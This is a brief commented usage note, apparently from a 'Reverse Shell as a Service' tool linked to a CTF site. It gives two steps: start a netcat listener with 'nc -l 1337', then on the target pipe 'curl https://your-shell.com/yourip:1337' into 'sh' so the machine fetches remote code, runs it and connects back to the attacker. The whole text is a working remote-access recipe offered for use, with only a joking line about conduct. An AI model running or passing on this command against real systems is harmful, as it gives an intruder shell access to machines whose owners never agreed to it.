# Reverse Shell as a Service # https://ctf.show/ # # 1. On your machine: # nc -l 1337 # # 2. On the target machine: # curl https://your-shell.com/yourip:1337 | sh # # 3. Don't be a dick